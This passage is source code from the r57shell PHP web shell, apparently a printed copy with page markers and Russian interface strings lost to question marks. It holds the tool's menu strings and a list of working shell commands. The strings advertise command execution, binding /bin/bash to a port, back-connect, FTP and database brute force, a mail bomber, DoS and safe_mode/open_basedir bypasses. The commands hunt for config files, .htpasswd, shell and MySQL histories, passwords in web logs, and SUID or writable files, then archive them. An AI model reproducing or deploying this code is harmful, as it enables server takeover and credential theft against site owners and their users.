  • 40. if(isset($_GET['33'])) {$_POST['cmd'] = 'fdisk -l';} if(isset($_GET['34'])) {$_POST['cmd'] = 'df -h';} #if(isset($_GET[''])) # {$_POST['cmd'] = '';} $lang=array( 'ru_butt1' =>'?????????', 'ru_butt2' =>'?????????', 'ru_butt3' =>'???????', 'ru_butt4' =>'?????????', 'ru_butt5' =>'?????????', 'ru_butt6' =>'???????', 'ru_butt7' =>'???????', 'ru_butt8' =>'?????????', 'ru_butt9' =>'????', 'ru_butt10'=>'?????????', 'ru_butt11'=>'?????????????', 'ru_butt12'=>'?????', 'ru_butt13'=>'???????/???????', 'ru_butt14'=>'???????', 'ru_butt15'=>'?????????', 'ru_text1' =>'??????????? ???????', 'ru_text2' =>'?????????? ?????? ?? ???????', 'ru_text3' =>'????????? ???????', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 41. 'ru_text4' =>'??????? ??????????', 'ru_text5' =>'???????? ?????? ?? ??????', 'ru_text6' =>'????????? ????', 'ru_text7' =>'??????', 'ru_text8' =>'???????? ?????', 'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash', 'ru_text10'=>'??????? ????', 'ru_text11'=>'?????? ??? ???????', 'ru_text12'=>'back-connect', 'ru_text13'=>'IP-?????', 'ru_text14'=>'????', 'ru_text15'=>'???????? ?????? ? ?????????? ???????', 'ru_text16'=>'????????????', 'ru_text17'=>'????????? ????', 'ru_text18'=>'????????? ????', 'ru_text19'=>'Exploits', 'ru_text20'=>'????????????', 'ru_text21'=>'????? ???', 'ru_text22'=>'datapipe', 'ru_text23'=>'????????? ????', 'ru_text24'=>'????????? ????', 'ru_text25'=>'????????? ????', 'ru_text26'=>'????????????', 'ru_text28'=>'?????? ? safe_mode', 'ru_text29'=>'?????? ????????', 'ru_text30'=>'???????? ?????', 'ru_text31'=>'???? ?? ??????', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 42. 'ru_text32'=>'?????????? PHP ????', 'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL (PHP <= 4.4.2, 5.1.4)', 'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include', 'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql', 'ru_text36'=>'???? . ???????', 'ru_text37'=>'?????', 'ru_text38'=>'??????', 'ru_text39'=>'????', 'ru_text40'=>'???? ??????? ???? ??????', 'ru_text41'=>'????????? ? ?????', 'ru_text42'=>'?????????????? ?????', 'ru_text43'=>'????????????? ????', 'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!', 'ru_text45'=>'???? ????????', 'ru_text46'=>'???????? phpinfo()', 'ru_text47'=>'???????? ???????? php.ini', 'ru_text48'=>'???????? ????????? ??????', 'ru_text49'=>'???????? ??????? ? ???????', 'ru_text50'=>'?????????? ? ??????????', 'ru_text51'=>'?????????? ? ??????', 'ru_text52'=>'????? ??? ??????', 'ru_text53'=>'?????? ? ?????', 'ru_text54'=>'????? ?????? ? ??????', 'ru_text55'=>'?????? ? ??????', 'ru_text56'=>'?????? ?? ???????', 'ru_text57'=>'???????/??????? ????/??????????', 'ru_text58'=>'???', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 43. 'ru_text59'=>'????', 'ru_text60'=>'??????????', 'ru_text61'=>'???? ??????', 'ru_text62'=>'?????????? ???????', 'ru_text63'=>'???? ??????', 'ru_text64'=>'?????????? ???????', 'ru_text65'=>'???????', 'ru_text66'=>'???????', 'ru_text67'=>'Chown/Chgrp/Chmod', 'ru_text68'=>'???????', 'ru_text69'=>'????????1', 'ru_text70'=>'????????2', 'ru_text71'=>"?????? ???????? ???????:rn- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) rn- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) rn- ??? ??????? CHMOD - ????? ????? ? ???????????? ?? ??????????? (???????? 0777)", 'ru_text72'=>'????? ??? ??????', 'ru_text73'=>'?????? ? ?????', 'ru_text74'=>'?????? ? ??????', 'ru_text75'=>'* ????? ???????????? ?????????? ?????????', 'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find', 'ru_text80'=>'???', 'ru_text81'=>'????', 'ru_text82'=>'???? ??????', 'ru_text83'=>'?????????? SQL ???????', 'ru_text84'=>'SQL ??????', 'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ??????? ', 'ru_text86'=>'?????????? ????? ? ???????', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 44. 'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????', 'ru_text88'=>'??????:????', 'ru_text89'=>'???? ?? ftp ???????', 'ru_text90'=>'????? ????????', 'ru_text91'=>'???????????? ?', 'ru_text92'=>'??? ?????.', 'ru_text93'=>'FTP', 'ru_text94'=>'FTP-????????', 'ru_text95'=>'?????? ?????????????', 'ru_text96'=>'?? ??????? ???????? ?????? ?????????????', 'ru_text97'=>'????????? ??????????: ', 'ru_text98'=>'??????? ???????????: ', 'ru_text99'=>'/etc/passwd', 'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????', 'ru_text101'=>'???????????? (user -> resu)', 'ru_text102'=>'?????', 'ru_text103'=>'???????? ??????', 'ru_text104'=>'???????? ????? ?? ???????? ????', 'ru_text105'=>'????', 'ru_text106'=>'??', 'ru_text107'=>'????', 'ru_text108'=>'????? ??????', 'ru_text109'=>'????????', 'ru_text110'=>'??????????', 'ru_text111'=>'SQL-?????? : ????', 'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', 'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ??????? file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 45. ??????? imap_list() (PHP <= 5.1.2)', 'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? imap_body() (PHP <= 5.1.2)', 'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)', 'ru_text116'=>'?????????? ????', 'ru_text117'=>'?', 'ru_text118'=>'???? ??????????', 'ru_text119'=>'?? ??????? ??????????? ????', 'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ????????? ????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST', 'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? fopen() (PHP v4.4.0 memory leak) by NST', 'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? glob() (PHP <= 5.2.x)', 'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)', 'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)', 'ru_text125'=>'??????', 'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ??????? [NULL-byte] (PHP <= 5.2.0)', 'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)', 'ru_text128'=>'???? ?????????/??????? ????? (touch)', 'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)', 'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)', 'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ??????? ??????? symlink() (PHP <= 5.2.1)', 'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? symlink() (PHP <= 5.2.1)', 'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ??????? file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 46. (TMPDIR) (PHP <= 5.2.4)', 'ru_text134'=>'???????? ??? ??????', 'ru_text135'=>'???????', 'ru_text136'=>'???????? ?????????? ??????', 'ru_text137'=>'????????', 'ru_text138'=>'???????', 'ru_text139'=>'????-??????', 'ru_text140'=>'DoS', 'ru_text141'=>'?????????! ???????? ???? ???-???????.', 'ru_text142'=>'????????? ???????', 'ru_text143'=>'Temp: ', 'ru_text144'=>'Test bypass safe_mode with load file in mysqli', 'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ????? ????????? realpath() (PHP <= 5.2.4)', 'ru_text146'=>'MAX ???-?? ????????', 'ru_text147'=>'', 'ru_text148'=>'', 'ru_text149'=>'', 'ru_text150'=>'', 'ru_err0'=>'??????! ?? ???? ???????? ? ???? ', 'ru_err1'=>'??????! ?? ???? ????????? ???? ', 'ru_err2'=>'??????! ?? ??????? ??????? ', 'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????', 'ru_err4'=>'?????? ??????????? ?? ftp ???????', 'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????', 'ru_err6'=>'??????! ?? ??????? ????????? ??????', 'ru_err7'=>'?????? ??????????', /* --------------------------------------------------------------- */ file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 47. 'eng_butt1' =>'Execute', 'eng_butt2' =>'Upload', 'eng_butt3' =>'Bind', 'eng_butt4' =>'Connect', 'eng_butt5' =>'Run', 'eng_butt6' =>'Change', 'eng_butt7' =>'Show', 'eng_butt8' =>'Test', 'eng_butt9' =>'Dump', 'eng_butt10'=>'Save', 'eng_butt11'=>'Edit file', 'eng_butt12'=>'Find', 'eng_butt13'=>'Create/Delete', 'eng_butt14'=>'Download', 'eng_butt15'=>'Send', 'eng_text1' =>'Executed command', 'eng_text2' =>'Execute command on server', 'eng_text3' =>'Run command', 'eng_text4' =>'Work directory', 'eng_text5' =>'Upload files on server', 'eng_text6' =>'Local file', 'eng_text7' =>'Aliases', 'eng_text8' =>'Select alias', 'eng_text9' =>'Bind port to /bin/bash', 'eng_text10'=>'Port', 'eng_text11'=>'Password for access', 'eng_text12'=>'back-connect', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 48. 'eng_text13'=>'IP', 'eng_text14'=>'Port', 'eng_text15'=>'Upload files from remote server', 'eng_text16'=>'With', 'eng_text17'=>'Remote file', 'eng_text18'=>'Local file', 'eng_text19'=>'Exploits', 'eng_text20'=>'Use', 'eng_text21'=>'&nbsp;New name', 'eng_text22'=>'datapipe', 'eng_text23'=>'Local port', 'eng_text24'=>'Remote host', 'eng_text25'=>'Remote port', 'eng_text26'=>'Use', 'eng_text28'=>'Work in safe_mode', 'eng_text29'=>'ACCESS DENIED', 'eng_text30'=>'Cat file', 'eng_text31'=>'File not found', 'eng_text32'=>'Eval PHP code', 'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'Database . Table', 'eng_text37'=>'Login', 'eng_text38'=>'Password', 'eng_text39'=>'Database', 'eng_text40'=>'Dump database table', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 49. 'eng_text41'=>'Save dump in file', 'eng_text42'=>'Edit files', 'eng_text43'=>'File for edit', 'eng_text44'=>'Can't edit file! Only read access!', 'eng_text45'=>'File saved', 'eng_text46'=>'Show phpinfo()', 'eng_text47'=>'Show variables from php.ini', 'eng_text48'=>'Delete temp files', 'eng_text49'=>'Delete script from server', 'eng_text50'=>'View cpu info', 'eng_text51'=>'View memory info', 'eng_text52'=>'Find text', 'eng_text53'=>'In dirs', 'eng_text54'=>'Find text in files', 'eng_text55'=>'Only in files', 'eng_text56'=>'Nothing :(', 'eng_text57'=>'Create/Delete File/Dir', 'eng_text58'=>'name', 'eng_text59'=>'file', 'eng_text60'=>'dir', 'eng_text61'=>'File created', 'eng_text62'=>'Dir created', 'eng_text63'=>'File deleted', 'eng_text64'=>'Dir deleted', 'eng_text65'=>'Create', 'eng_text66'=>'Delete', 'eng_text67'=>'Chown/Chgrp/Chmod', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 50. 'eng_text68'=>'Command', 'eng_text69'=>'param1', 'eng_text70'=>'param2', 'eng_text71'=>"Second commands param is:rn- for CHOWN - name of new owner or UIDrn- for CHGRP - group name or GIDrn- for CHMOD - 0777, 0755...", 'eng_text72'=>'Text for find', 'eng_text73'=>'Find in folder', 'eng_text74'=>'Find in files', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'Search text in files via find', 'eng_text80'=>'Type', 'eng_text81'=>'Net', 'eng_text82'=>'Databases', 'eng_text83'=>'Run SQL query', 'eng_text84'=>'SQL query', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'Download files from server', 'eng_text87'=>'Download files from remote ftp-server', 'eng_text88'=>'server:port', 'eng_text89'=>'File on ftp', 'eng_text90'=>'Transfer mode', 'eng_text91'=>'Archivation', 'eng_text92'=>'without arch.', 'eng_text93'=>'FTP', 'eng_text94'=>'FTP-bruteforce', 'eng_text95'=>'Users list', 'eng_text96'=>'Can't get users list', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 51. 'eng_text97'=>'checked: ', 'eng_text98'=>'success: ', 'eng_text99'=>'/etc/passwd', 'eng_text100'=>'Send file to remote ftp server', 'eng_text101'=>'Use reverse (user -> resu)', 'eng_text102'=>'Mail', 'eng_text103'=>'Send email', 'eng_text104'=>'Send file to email', 'eng_text105'=>'To', 'eng_text106'=>'From', 'eng_text107'=>'Subj', 'eng_text108'=>'Mail', 'eng_text109'=>'Hide', 'eng_text110'=>'Show', 'eng_text111'=>'SQL-Server : Port', 'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)', 'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)', 'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)', 'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)', 'eng_text116'=>'Copy from', 'eng_text117'=>'to', 'eng_text118'=>'File copied', 'eng_text119'=>'Cant copy file', 'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST', 'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST', 'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)', 'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 52. 'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)', 'eng_text125'=>'Data', 'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)', 'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)', 'eng_text128'=>'Modify/Access file (touch)', 'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)', 'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)', 'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)', 'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)', 'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)', 'eng_text134'=>'Database-bruteforce', 'eng_text135'=>'Dictionary', 'eng_text136'=>'Creating evil symlink', 'eng_text137'=>'Useful', 'eng_text138'=>'Dangerous', 'eng_text139'=>'Mail Bomber', 'eng_text140'=>'DoS', 'eng_text141'=>'Danger! Web-daemon crash possible.', 'eng_text142'=>'Downloaders', 'eng_text143'=>'Temp: ', 'eng_text144'=>'Test bypass safe_mode with load file in mysqli', 'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)', 'eng_text146'=>'Max Interation', 'eng_text147'=>'', 'eng_text148'=>'', 'eng_text149'=>'', 'eng_text150'=>'', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 53. 'eng_err0'=>'Error! Can't write in file ', 'eng_err1'=>'Error! Can't read file ', 'eng_err2'=>'Error! Can't create ', 'eng_err3'=>'Error! Can't connect to ftp', 'eng_err4'=>'Error! Can't login on ftp server', 'eng_err5'=>'Error! Can't change dir on ftp', 'eng_err6'=>'Error! Can't sent mail', 'eng_err7'=>'Mail send', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????. */ $aliases=array( '----------------------------------locate'=>'', 'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 54. '.$tempdir.'grep.txt', 'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------tar'=>'', 'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt', '----------------------------------1'=>'', 'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 55. '.$tempdir.'grep.txt', 'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', '----------------------------------2'=>'', 'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', 'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt', '----------------------------------find'=>'', 'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', file:///C|/...ts%20and%20Settings/TALLES/Desktop/New%20Folder%20(4)/cum%20sa%20spargi%20un%20site/virusi/r57shell/r57shell.txt[5/10/2012 10:44:28 AM]
  • 56. 'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt', 'find conf.php files >> '.$tempdir.'grep.txt;cat 